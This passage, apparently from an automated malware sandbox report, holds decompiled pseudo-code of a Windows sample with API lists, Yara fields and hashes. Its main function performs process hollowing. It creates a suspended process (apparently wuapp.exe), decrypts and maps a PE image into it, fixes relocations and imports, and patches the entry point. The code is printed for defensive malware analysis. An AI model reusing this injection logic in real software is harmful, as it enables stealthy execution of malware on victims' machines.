                                                                                                                                          							__eflags = 0;
                                                                                                                                          							return 0;
                                                                                                                                          						} else {
                                                                                                                                          							return _t40;
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						__eflags = 0;
                                                                                                                                          						return _t24;
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					_t37 = E004022B0(_t46, E00401E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
                                                                                                                                          					_t62 = _t62 + 0x10;
                                                                                                                                          					 *0x5d1128 = _t37;
                                                                                                                                          					_t38 = _t37 | _t46;
                                                                                                                                          					 *0x5d112c = _t46;
                                                                                                                                          					if(_t38 != 0) {
                                                                                                                                          						goto L3;
                                                                                                                                          					} else {
                                                                                                                                          						return _t38;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}

Instruction addresses: 0x004021a0, 0x004021a3, 0x004021a8, 0x004021ab, 0x004021b1, 0x004021e1, 0x004021f0, 0x004021f6, 0x004021f8, 0x004021fa, 0x00402208, 0x00402208, 0x0040220c, 0x00402213, 0x00402215, 0x00402218, 0x0040221b, 0x00402223, 0x00402226, 0x0040222a, 0x0040222e, 0x00402231, 0x00402237, 0x0040223e, 0x0040223f, 0x00402244, 0x00402247, 0x00402248, 0x00402257, 0x00402263, 0x00402266, 0x0040226b, 0x0040226e, 0x00402273, 0x0040227a, 0x00402284, 0x0040228f, 0x00402295, 0x00402297, 0x004022a9, 0x004022af, 0x00402299, 0x004022a4, 0x004022a4, 0x004021fc, 0x004021fc, 0x00402202, 0x00402202, 0x004021b3, 0x004021c4, 0x004021c9, 0x004021cc, 0x004021d1, 0x004021d3, 0x004021d9, 0x00000000, 0x004021db, 0x004021e0, 0x004021e0, 0x004021d9

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000120,00003000,00000004,?,?,?,?,?,00406208,?,?,NtGetContextThread,?,?,?), ref: 004021F0
                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406208,?), ref: 0040228F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                          • String ID: LdrGetProcedureAddress$ntdll.dll
                                                                                                                                          • API String ID: 2087232378-1174695804
                                                                                                                                          • Opcode ID: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
                                                                                                                                          • Instruction ID: 0eb8dc9d9b9cb1f38aa61a5e869cd7518be7929c4289078d347e1877a8125501
                                                                                                                                          • Opcode Fuzzy Hash: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
                                                                                                                                          • Instruction Fuzzy Hash: EE31A675E01605ABD710DFA5DC4179AF7B5FF88314F10816BFA08A7290D774A910DBD8
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                          			E00403050(void* __ebx, void* __ecx, intOrPtr _a4, char _a8) {
                                                                                                                                          				char _v8;
                                                                                                                                          				void* _t8;
                                                                                                                                          				void* _t11;
                                                                                                                                          				void* _t22;
                                                                                                                                          				void* _t23;
                                                                                                                                          
                                                                                                                                          				_t15 = __ecx;
                                                                                                                                          				_push(__ecx);
                                                                                                                                          				_t20 = _a4;
                                                                                                                                          				_t3 =  &_a8; // 0x4049e6
                                                                                                                                          				_t17 =  *_t3;
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_t8 = E00402930(__ebx, __ecx, _a4,  *_t3,  &_v8); // executed
                                                                                                                                          				_t23 = _t22 + 0xc;
                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                          					_push(__ebx);
                                                                                                                                          					do {
                                                                                                                                          						Sleep(0x2bc);
                                                                                                                                          						_t11 = E00402930(Sleep, _t15, _t20, _t17,  &_v8);
                                                                                                                                          						_t23 = _t23 + 0xc;
                                                                                                                                          					} while (_t11 == 0);
                                                                                                                                          				}
                                                                                                                                          				return _v8;
                                                                                                                                          			}

Instruction addresses: 0x00403050, 0x00403053, 0x00403055, 0x0040305c, 0x0040305c, 0x00403062, 0x00403069, 0x0040306e, 0x00403073, 0x00403075, 0x00403080, 0x00403085, 0x0040308d, 0x00403092, 0x00403095, 0x00403099, 0x004030a2

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00402930: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
                                                                                                                                          • Sleep.KERNEL32(000002BC,00000000,004049E6,?), ref: 00403085
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AdjustPrivilegeSleep
                                                                                                                                          • String ID: I@
                                                                                                                                          • API String ID: 2381171102-3008766272
                                                                                                                                          • Opcode ID: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
                                                                                                                                          • Instruction ID: ed7222478eb7be61e29de2bc31fce2cbcf9e59994bb1285db2a9842840863ed2
                                                                                                                                          • Opcode Fuzzy Hash: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
                                                                                                                                          • Instruction Fuzzy Hash: B1F05476501118BBDB109A86DD45E9BB7ACEB4A315F140066FD08E3142E2709F0486B5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                          			E00402930(void* __ebx, char* __ecx, intOrPtr _a4, intOrPtr* _a12) {
                                                                                                                                          				char _v5;
                                                                                                                                          				intOrPtr _t10;
                                                                                                                                          				intOrPtr _t12;
                                                                                                                                          				void* _t13;
                                                                                                                                          				struct HINSTANCE__* _t17;
                                                                                                                                          
                                                                                                                                          				_t14 = __ecx;
                                                                                                                                          				_t13 = __ebx;
                                                                                                                                          				_push(__ecx);
                                                                                                                                          				RtlAdjustPrivilege(0x14, 1, 0,  &_v5); // executed
                                                                                                                                          				if( *0x5d1314 == 0) {
                                                                                                                                          					__eflags =  *0x5d1bb8;
                                                                                                                                          					_push(_a4);
                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                          						goto L4;
                                                                                                                                          					} else {
                                                                                                                                          						_t10 = E00405420(_t14, _t17, __eflags);
                                                                                                                                          					}
                                                                                                                                          					goto L5;
                                                                                                                                          				} else {
                                                                                                                                          					if( *0x5d1bb8 != 0) {
                                                                                                                                          						__eflags =  *0x5d1318;
                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                          							goto L9;
                                                                                                                                          						} else {
                                                                                                                                          							_t12 = E00405420(_t14, _t17, __eflags, _a4);
                                                                                                                                          						}
                                                                                                                                          						goto L10;
                                                                                                                                          					} else {
                                                                                                                                          						_t24 =  *0x5d1318;
                                                                                                                                          						if( *0x5d1318 == 0) {
                                                                                                                                          							L9:
                                                                                                                                          							_push(_a4);
                                                                                                                                          							_push(0xdd400);
                                                                                                                                          							_push(0x4f3c38); // executed
                                                                                                                                          							_t12 = E00405E60(_t14, _t17, __eflags); // executed
                                                                                                                                          							L10:
                                                                                                                                          							 *_a12 = _t12;
                                                                                                                                          							__eflags = _t12;
                                                                                                                                          							if(_t12 != 0) {
                                                                                                                                          								goto L14;
                                                                                                                                          							} else {
                                                                                                                                          								 *0x5d1130 =  *0x5d1130 + 1;
                                                                                                                                          								__eflags =  *0x5d1130;
                                                                                                                                          								return _t12;
                                                                                                                                          							}
                                                                                                                                          						} else {
                                                                                                                                          							_push(_a4);
                                                                                                                                          							L4:
                                                                                                                                          							_t10 = E00405B80(_t13, _t14, _t24);
                                                                                                                                          							L5:
                                                                                                                                          							 *_a12 = _t10;
                                                                                                                                          							if(_t10 != 0) {
                                                                                                                                          								L14:
                                                                                                                                          								return 1;
                                                                                                                                          							} else {
                                                                                                                                          								return _t10;
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AdjustPrivilege
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3260937286-0
                                                                                                                                          • Opcode ID: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
                                                                                                                                          • Instruction ID: 506e94688713331cfc66463232599238f62637629a90eb22369aba3845a8fa88
                                                                                                                                          • Opcode Fuzzy Hash: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
                                                                                                                                          • Instruction Fuzzy Hash: 3811C8B0702609BBDB215F50ED0DBA63764E710349F10017BFD09352E0E7BA99D8DA9E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E00407ED0(WCHAR* _a4) {
                                                                                                                                          				signed char _t3;
                                                                                                                                          
                                                                                                                                          				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                                                          				if(_t3 == 0xffffffff || (_t3 & 0x00000010) != 0) {
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					return 1;
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                          • Opcode ID: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
                                                                                                                                          • Instruction ID: bc5cfff1355e279673e223a49d8db9145eaba15aaeeac5c753cdea018dd9536a
                                                                                                                                          • Opcode Fuzzy Hash: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
                                                                                                                                          • Instruction Fuzzy Hash: D2C0803040510C1BDF104568EC04255370CC701374F504B71FC1CD45F1D337BC924199
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Non-executed Functions

                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E00405420(char* __ecx, struct HINSTANCE__* __edx, void* __eflags, WCHAR* _a4) {
                                                                                                                                          				CHAR* _v8;
                                                                                                                                          				void _v12;
                                                                                                                                          				CHAR* _v16;
                                                                                                                                          				struct HINSTANCE__* _v20;
                                                                                                                                          				struct HINSTANCE__* _v24;
                                                                                                                                          				void* _v28;
                                                                                                                                          				void* _v32;
                                                                                                                                          				CHAR** _v36;
                                                                                                                                          				long _v40;
                                                                                                                                          				struct _PROCESS_INFORMATION _v56;
                                                                                                                                          				long _v60;
                                                                                                                                          				long _v64;
                                                                                                                                          				intOrPtr _v68;
                                                                                                                                          				long _v72;
                                                                                                                                          				void* _v76;
                                                                                                                                          				char _v80;
                                                                                                                                          				char _v83;
                                                                                                                                          				intOrPtr _v87;
                                                                                                                                          				char _v88;
                                                                                                                                          				intOrPtr _v92;
                                                                                                                                          				long _v100;
                                                                                                                                          				long _v108;
                                                                                                                                          				intOrPtr _v128;
                                                                                                                                          				char _v132;
                                                                                                                                          				struct _STARTUPINFOW _v200;
                                                                                                                                          				struct _CONTEXT _v916;
                                                                                                                                          				int _t154;
                                                                                                                                          				CHAR* _t155;
                                                                                                                                          				CHAR* _t156;
                                                                                                                                          				void* _t160;
                                                                                                                                          				void* _t161;
                                                                                                                                          				CHAR* _t162;
                                                                                                                                          				CHAR* _t163;
                                                                                                                                          				CHAR* _t175;
                                                                                                                                          				CHAR* _t178;
                                                                                                                                          				intOrPtr _t179;
                                                                                                                                          				CHAR** _t180;
                                                                                                                                          				CHAR* _t186;
                                                                                                                                          				CHAR* _t190;
                                                                                                                                          				CHAR* _t194;
                                                                                                                                          				void* _t197;
				long _t199;
				CHAR* _t208;
				signed short _t211;
				CHAR* _t213;
				_Unknown_base(*)()* _t214;
				intOrPtr _t218;
				CHAR* _t225;
				CHAR* _t229;
				void* _t234;
				void* _t235;
				CHAR* _t250;
				CHAR* _t261;
				CHAR* _t266;
				CHAR** _t273;
				CHAR* _t275;
				CHAR* _t278;
				CHAR* _t284;
				signed int _t285;
				signed int _t286;
				struct HINSTANCE__* _t287;
				CHAR** _t288;
				CHAR* _t291;
				long _t294;
				CHAR* _t295;
				_Unknown_base(*)()** _t297;
				CHAR** _t299;
				intOrPtr _t301;
				long _t304;
				void* _t305;
				void* _t307;
				CHAR* _t309;
				signed short* _t310;
				CHAR** _t311;
				void* _t312;
				signed short* _t314;
				CHAR* _t315;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t324;

				_t287 = __edx;
				_t280 = __ecx;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				_v72 = 0;
				_v40 = 0;
				_v20 = 0;
				_v64 = 0;
				_v60 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = 0;
				_v8 = 0;
				_v76 = 0;
				_v24 = 0;
				asm("movups [ebp-0x80], xmm0");
				asm("movq [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				asm("movq [ebp-0x68], xmm0");
				asm("movups [ebp-0x34], xmm0");
				E00401BB0( &_v200, 0, 0x44);
				E00401BB0( &_v916, 0, 0x2cc);
				_v200.cb = 0x44;
				_t317 = _t316 + 0x18;
				_t324 =  *0x40c038 - 0x5a4d; // 0x6b7d
				if(_t324 != 0) {
					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
					_t317 = _t317 + 0x10;
				}
				_t154 = CreateProcessW(0, _a4, 0, 0, 0, 0x8000004, 0, 0,  &_v200,  &_v56);
				if(_t154 != 0) {
					_t155 =  *0x5d108c;
					__eflags = _t155;
					if(_t155 != 0) {
						_t280 =  &_v132;
						_t156 =  *_t155(_v56.hProcess, 0,  &_v132, 0x18, 0);
						__eflags = _t156;
						if(_t156 != 0) {
							goto L9;
						} else {
							_t175 = ReadProcessMemory(_v56.hProcess, _v128 + 8,  &_v12, 4,  &_v40);
							__eflags = _t175;
							if(_t175 == 0) {
								goto L8;
							} else {
								__eflags = _v40 - 4;
								if(_v40 != 4) {
									goto L8;
								} else {
									goto L21;
								}
							}
						}
					} else {
						_v916.ContextFlags = 0x10007;
						_t261 = GetThreadContext(_v56.hThread,  &_v916);
						__eflags = _t261;
						if(_t261 == 0) {
							L9:
							TerminateProcess(_v56.hProcess, 0);
							CloseHandle(_v56.hProcess);
							CloseHandle(_v56.hThread);
							_t160 = _v28;
							__eflags = _t160;
							if(_t160 != 0) {
								NtClose(_t160);
							}
							_t161 = _v32;
							__eflags = _t161;
							if(_t161 != 0) {
								NtClose(_t161);
							}
							_t162 = _v16;
							__eflags = _t162;
							if(_t162 != 0) {
								asm("cdq");
								E00407120(_t287, GetCurrentProcess(), _t162, _t287);
							}
							_t163 = _v8;
							__eflags = _t163;
							if(_t163 != 0) {
								asm("cdq");
								E00407120(_t287, GetCurrentProcess(), _t163, _t287);
							}
							__eflags = 0;
							return 0;
						} else {
							_t266 = ReadProcessMemory(_v56.hProcess, _v916.Ebx + 8,  &_v12, 4,  &_v40);
							__eflags = _t266;
							if(_t266 == 0) {
								L8:
								goto L9;
							} else {
								__eflags = _v40 - 4;
								if(_v40 == 4) {
									L21:
									_t178 = E00405A50(_t280, _v56.hProcess, _v12,  &_v20,  &_v72);
									_t318 = _t317 + 0x10;
									__eflags = _t178;
									if(_t178 == 0) {
										goto L8;
									} else {
										__eflags =  *0x40c038 - 0x5a4d; // 0x6b7d
										if(__eflags != 0) {
											goto L8;
										} else {
											_t179 =  *0x40c074; // 0x383538b7
											__eflags =  *((intOrPtr*)(_t179 + 0x40c038)) - 0x4550;
											_t180 = _t179 + 0x40c038;
											_v36 = _t180;
											if( *((intOrPtr*)(_t179 + 0x40c038)) != 0x4550) {
												goto L8;
											} else {
												__eflags =  *((intOrPtr*)(_t180 + 0x18)) - 0x10b;
												if( *((intOrPtr*)(_t180 + 0x18)) != 0x10b) {
													goto L8;
												} else {
													__eflags =  *(_t180 + 0xa0);
													_t304 =  *(_t180 + 0x50);
													_v68 =  *((intOrPtr*)(_t180 + 0x34));
													_t283 =  *((intOrPtr*)(_t180 + 0x28));
													_v80 =  *((intOrPtr*)(_t180 + 0x28));
													if(__eflags == 0) {
														goto L8;
													} else {
														_t294 = _v20;
														_v100 = _t294;
														__eflags = E00406F00(_t283, _t287, __eflags,  &_v28, 0xf001f, 0,  &_v100, 0x40, 0x8000000, 0);
														if(__eflags != 0) {
															goto L8;
														} else {
															_v108 = _t304;
															_t186 = E00406F00(_t283, _t287, __eflags,  &_v32, 0xf001f, 0,  &_v108, 0x40, 0x8000000, _t183);
															__eflags = _t186;
															if(_t186 != 0) {
																goto L8;
															} else {
																_v16 = _t186;
																_v64 = _t294;
																_t190 = E00406FE0(_t283, _t287, _v28, GetCurrentProcess(),  &_v16, 0, 0, 0,  &_v64, 1, _t186, 0x40);
																__eflags = _t190;
																if(_t190 != 0) {
																	goto L8;
																} else {
																	_v8 = _t190;
																	_v60 = _t304;
																	_t194 = E00406FE0(_t283, _t287, _v32, GetCurrentProcess(),  &_v8, 0, 0, 0,  &_v60, 1, _t190, 0x40);
																	__eflags = _t194;
																	if(_t194 != 0) {
																		goto L8;
																	} else {
																		_v24 = _t194;
																		_t197 = E00406FE0(_t283, _t287, _v32, _v56.hProcess,  &_v24, 0, 0, 0,  &_v60, 1, _t194, 0x40);
																		__eflags = _t197;
																		if(_t197 != 0) {
																			goto L8;
																		} else {
																			_t305 = VirtualAlloc(_t197, _t294, 0x3000, 4);
																			__eflags = _t305;
																			if(_t305 == 0) {
																				goto L8;
																			} else {
																				_t199 = ReadProcessMemory(_v56.hProcess, _v12, _t305, _t294, 0);
																				__eflags = _t199;
																				if(_t199 != 0) {
																					E00401640(_v16, _t305, _t294);
																					VirtualFree(_t305, 0, 0x8000);
																					_t273 = _v36;
																					_t295 =  *(_t273 + 6) & 0x0000ffff;
																					_t82 = _t273 + 0x18; // 0x18
																					_t307 = _t82 + ( *(_t273 + 0x14) & 0x0000ffff);
																					E00401640(_v8, 0x40c038, (_t295 + _t295 * 4 << 3) - 0x40c038 + _t307);
																					_t320 = _t318 + 0x18;
																					__eflags = _t295;
                                                                                                                                          																					if(_t295 != 0) {
                                                                                                                                          																						_t315 = _t307 + 0x14;
                                                                                                                                          																						__eflags = _t315;
                                                                                                                                          																						do {
                                                                                                                                          																							E00401640( *((intOrPtr*)(_t315 - 8)) + _v8,  *_t315 + 0x40c038,  *((intOrPtr*)(_t315 - 4)));
                                                                                                                                          																							_t320 = _t320 + 0xc;
                                                                                                                                          																							_t315 =  &(_t315[0x28]);
                                                                                                                                          																							_t295 = _t295 - 1;
                                                                                                                                          																							__eflags = _t295;
                                                                                                                                          																						} while (_t295 != 0);
                                                                                                                                          																					}
                                                                                                                                          																					_t284 = _v8;
                                                                                                                                          																					_t275 =  *((intOrPtr*)(_t273 + 0x80)) + _t284;
                                                                                                                                          																					__eflags = _t275;
                                                                                                                                          																					while(1) {
                                                                                                                                          																						_t208 = _t275[0xc];
                                                                                                                                          																						__eflags = _t208;
                                                                                                                                          																						if(_t208 != 0) {
                                                                                                                                          																							goto L40;
                                                                                                                                          																						}
                                                                                                                                          																						__eflags = _t275[4] - _t208;
                                                                                                                                          																						if(_t275[4] == _t208) {
                                                                                                                                          																							_t311 = _v36;
                                                                                                                                          																							_t287 = _v24;
                                                                                                                                          																							_v68 = _t287 - _v68;
                                                                                                                                          																							_t299 =  *((intOrPtr*)(_t311 + 0xa0)) + _t284;
                                                                                                                                          																							_t218 =  *((intOrPtr*)(_t311 + 0xa4)) + _t299;
                                                                                                                                          																							_v36 = _t299;
                                                                                                                                          																							_v92 = _t218;
                                                                                                                                          																							__eflags = _t299 - _t218;
                                                                                                                                          																							if(_t299 < _t218) {
                                                                                                                                          																								while(1) {
                                                                                                                                          																									_t250 =  *_t299;
                                                                                                                                          																									__eflags = _t250;
                                                                                                                                          																									if(_t250 == 0) {
                                                                                                                                          																										break;
                                                                                                                                          																									}
                                                                                                                                          																									_t288 =  &(_t299[1]);
                                                                                                                                          																									_v20 = _t288;
                                                                                                                                          																									_t314 =  &(_t299[2]);
                                                                                                                                          																									_t278 =  &(_t250[_t284]);
                                                                                                                                          																									_t291 =  *_t288 - 8 >> 1;
                                                                                                                                          																									__eflags = _t291;
                                                                                                                                          																									if(_t291 != 0) {
                                                                                                                                          																										_t301 = _v68;
                                                                                                                                          																										do {
                                                                                                                                          																											_t285 =  *_t314 & 0x0000ffff;
                                                                                                                                          																											_t291 = _t291 - 1;
                                                                                                                                          																											__eflags = (_t285 & 0x0000f000) - 0x3000;
                                                                                                                                          																											if((_t285 & 0x0000f000) == 0x3000) {
                                                                                                                                          																												_t286 = _t285 & 0x00000fff;
                                                                                                                                          																												_t114 =  &(_t278[_t286]);
                                                                                                                                          																												 *_t114 =  &(_t278[_t286][_t301]);
                                                                                                                                          																												__eflags =  *_t114;
                                                                                                                                          																											}
                                                                                                                                          																											_t314 =  &(_t314[1]);
                                                                                                                                          																											__eflags = _t291;
                                                                                                                                          																										} while (_t291 != 0);
                                                                                                                                          																										_t284 = _v8;
                                                                                                                                          																										_t299 = _v36;
                                                                                                                                          																									}
                                                                                                                                          																									_t299 = _t299 +  *_v20;
                                                                                                                                          																									_v36 = _t299;
                                                                                                                                          																									__eflags = _t299 - _v92;
                                                                                                                                          																									if(_t299 < _v92) {
                                                                                                                                          																										continue;
                                                                                                                                          																									}
                                                                                                                                          																									break;
                                                                                                                                          																								}
                                                                                                                                          																								_t287 = _v24;
                                                                                                                                          																							}
                                                                                                                                          																							_v88 = 0x68;
                                                                                                                                          																							_v87 = _v80 + _t287;
                                                                                                                                          																							_v83 = 0xc3;
                                                                                                                                          																							E00401640( &(_v16[_v72]),  &_v88, 6);
                                                                                                                                          																							_t225 = E00407120(_t287, _v56.hProcess, _v12, 0);
                                                                                                                                          																							__eflags = _t225;
                                                                                                                                          																							if(_t225 != 0) {
                                                                                                                                          																								goto L8;
                                                                                                                                          																							} else {
                                                                                                                                          																								_v76 = _v12;
                                                                                                                                          																								_t229 = E00406FE0(_t284, _t287, _v28, _v56.hProcess,  &_v76, 0, 0, 0,  &_v64, 1, 0, 0x40);
                                                                                                                                          																								__eflags = _t229;
                                                                                                                                          																								if(_t229 != 0) {
                                                                                                                                          																									goto L8;
                                                                                                                                          																								} else {
                                                                                                                                          																									E004071A0(_t284, _t287, _v56.hThread);
                                                                                                                                          																									Sleep(0x1388);
                                                                                                                                          																									_t312 = VirtualAlloc(0, 0x138, 0x3000, 4);
                                                                                                                                          																									__eflags = _t312;
                                                                                                                                          																									if(_t312 != 0) {
                                                                                                                                          																										E00401BB0(_t312, 0, 0x138);
                                                                                                                                          																										asm("cdq");
                                                                                                                                          																										E004074D0(_t284, _t287, _v56.hProcess, _v24, _t287, _t312, 0x138,  &_v80);
                                                                                                                                          																										VirtualFree(_t312, 0, 0x8000);
                                                                                                                                          																									}
                                                                                                                                          																									CloseHandle(_v56);
                                                                                                                                          																									CloseHandle(_v56.hThread);
                                                                                                                                          																									_t234 = _v28;
                                                                                                                                          																									__eflags = _t234;
                                                                                                                                          																									if(_t234 != 0) {
                                                                                                                                          																										NtClose(_t234);
                                                                                                                                          																									}
                                                                                                                                          																									_t235 = _v32;
                                                                                                                                          																									__eflags = _t235;
                                                                                                                                          																									if(_t235 != 0) {
                                                                                                                                          																										NtClose(_t235);
                                                                                                                                          																									}
                                                                                                                                          																									asm("cdq");
                                                                                                                                          																									E00407120(_t287, GetCurrentProcess(), _v16, _t287);
                                                                                                                                          																									asm("cdq");
                                                                                                                                          																									E00407120(_t287, GetCurrentProcess(), _v8, _t287);
                                                                                                                                          																									_t147 =  &(_v56.dwProcessId); // 0x40306e
                                                                                                                                          																									return  *_t147;
                                                                                                                                          																								}
                                                                                                                                          																							}
                                                                                                                                          																						} else {
                                                                                                                                          																							goto L40;
                                                                                                                                          																						}
                                                                                                                                          																						goto L69;
                                                                                                                                          																						L40:
                                                                                                                                          																						_t287 = E00408B00( &(_t208[_t284]));
                                                                                                                                          																						_t320 = _t320 + 4;
                                                                                                                                          																						_v20 = _t287;
                                                                                                                                          																						__eflags = _t287;
                                                                                                                                          																						if(_t287 == 0) {
                                                                                                                                          																							goto L8;
                                                                                                                                          																						} else {
                                                                                                                                          																							_t284 = _v8;
                                                                                                                                          																							_t309 =  &(_t284[ *_t275]);
                                                                                                                                          																							_t297 =  &(_t284[_t275[0x10]]);
                                                                                                                                          																							__eflags = _t309 - _t284;
                                                                                                                                          																							_t310 =  ==  ? _t297 : _t309;
                                                                                                                                          																							__eflags = _t310 - _t284;
                                                                                                                                          																							if(_t310 == _t284) {
                                                                                                                                          																								goto L8;
                                                                                                                                          																							} else {
                                                                                                                                          																								_t211 =  *_t310;
                                                                                                                                          																								__eflags = _t211;
                                                                                                                                          																								if(_t211 == 0) {
                                                                                                                                          																									L49:
                                                                                                                                          																									_t275 =  &(_t275[0x14]);
                                                                                                                                          																									continue;
                                                                                                                                          																								} else {
                                                                                                                                          																									while(1) {
                                                                                                                                          																										__eflags = _t211;
                                                                                                                                          																										if(_t211 >= 0) {
                                                                                                                                          																											_t213 = _t211 + 2 + _t284;
                                                                                                                                          																											__eflags = _t213;
                                                                                                                                          																										} else {
                                                                                                                                          																											_t213 = _t211 & 0x0000ffff;
                                                                                                                                          																										}
                                                                                                                                          																										_t214 = GetProcAddress(_t287, _t213);
                                                                                                                                          																										 *_t297 = _t214;
                                                                                                                                          																										__eflags = _t214;
                                                                                                                                          																										if(_t214 == 0) {
                                                                                                                                          																											goto L8;
                                                                                                                                          																										}
                                                                                                                                          																										_t211 = _t310[2];
                                                                                                                                          																										_t310 =  &(_t310[2]);
                                                                                                                                          																										_t284 = _v8;
                                                                                                                                          																										_t297 = _t297 + 4;
                                                                                                                                          																										__eflags = _t211;
                                                                                                                                          																										if(_t211 == 0) {
                                                                                                                                          																											goto L49;
                                                                                                                                          																										} else {
                                                                                                                                          																											_t287 = _v20;
                                                                                                                                          																											continue;
                                                                                                                                          																										}
                                                                                                                                          																										goto L69;
                                                                                                                                          																									}
                                                                                                                                          																									goto L8;
                                                                                                                                          																								}
                                                                                                                                          																							}
                                                                                                                                          																						}
                                                                                                                                          																						goto L69;
                                                                                                                                          																					}
                                                                                                                                          																				} else {
                                                                                                                                          																					VirtualFree(_t305, _t199, 0x8000);
                                                                                                                                          																					goto L8;
                                                                                                                                          																				}
                                                                                                                                          																			}
                                                                                                                                          																		}
                                                                                                                                          																	}
                                                                                                                                          																}
                                                                                                                                          															}
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								} else {
                                                                                                                                          									goto L8;
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					return _t154;
                                                                                                                                          				}
                                                                                                                                          				L69:
                                                                                                                                          			}
[Instruction address column for the decompiled function above, covering 0x00405420 to 0x0040582d; the per-line alignment with the C code was lost in extraction, so the individual addresses are omitted here.]
                                                                                                                                          0x00405830
                                                                                                                                          0x00405830
                                                                                                                                          0x00405833
                                                                                                                                          0x00405835
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00405837
                                                                                                                                          0x0040583a
                                                                                                                                          0x004058ad
                                                                                                                                          0x004058b0
                                                                                                                                          0x004058b8
                                                                                                                                          0x004058c7
                                                                                                                                          0x004058c9
                                                                                                                                          0x004058cb
                                                                                                                                          0x004058ce
                                                                                                                                          0x004058d1
                                                                                                                                          0x004058d3
                                                                                                                                          0x004058d5
                                                                                                                                          0x004058d5
                                                                                                                                          0x004058d7
                                                                                                                                          0x004058d9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004058db
                                                                                                                                          0x004058de
                                                                                                                                          0x004058e1
                                                                                                                                          0x004058e6
                                                                                                                                          0x004058ec
                                                                                                                                          0x004058ec
                                                                                                                                          0x004058ee
                                                                                                                                          0x004058f0
                                                                                                                                          0x004058f3
                                                                                                                                          0x004058f3
                                                                                                                                          0x004058f6
                                                                                                                                          0x004058fe
                                                                                                                                          0x00405903
                                                                                                                                          0x00405905
                                                                                                                                          0x0040590b
                                                                                                                                          0x0040590b
                                                                                                                                          0x0040590b
                                                                                                                                          0x0040590b
                                                                                                                                          0x0040590e
                                                                                                                                          0x00405911
                                                                                                                                          0x00405911
                                                                                                                                          0x00405915
                                                                                                                                          0x00405918
                                                                                                                                          0x00405918
                                                                                                                                          0x0040591e
                                                                                                                                          0x00405920
                                                                                                                                          0x00405923
                                                                                                                                          0x00405926
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
